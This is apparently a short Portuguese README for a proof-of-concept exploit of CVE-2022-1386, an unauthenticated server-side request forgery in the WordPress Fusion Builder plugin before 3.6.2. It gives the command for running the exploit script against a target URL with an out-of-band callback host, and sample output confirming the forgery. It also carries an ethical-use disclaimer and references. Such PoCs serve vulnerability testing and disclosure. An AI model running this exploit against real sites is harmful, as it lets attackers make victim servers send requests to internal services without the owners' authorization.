
PoC de SSRF não autenticado no WordPress Fusion Builder <3.6.2 (CVE-2022-1386)
Falsificação de Solicitação do Lado do Servidor (SSRF) sem autenticação no plugin Fusion Builder (usado pelo tema Avada WordPress) anterior à versão 3.6.2.
Permite que atacantes façam solicitações HTTP para URLs arbitrárias, potencialmente visando serviços internos.
admin-ajax.phppython3 exploit_cve_2022_1386.py <target_url> <your_callback_url>
Exemplo:
python3 exploit_cve_2022_1386.py https://vulnerable.site https://abc123.oast.fun
Use o Interact.sh ou o [Burp Collaborator] para receber o callback.
📋 Exemplo de Saída
[*] Fetching nonce from target...
[*] Sending SSRF payload to https://abc123.oast.fun...
[+] SSRF confirmed: received callback from victim server.
📌 Notas Este PoC evita exfiltração de dados. Uso apenas ético: não explore sistemas sem autorização.
📚 Referências https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b https://theme-fusion.com/documentation/avada/fusion-builder-changelog/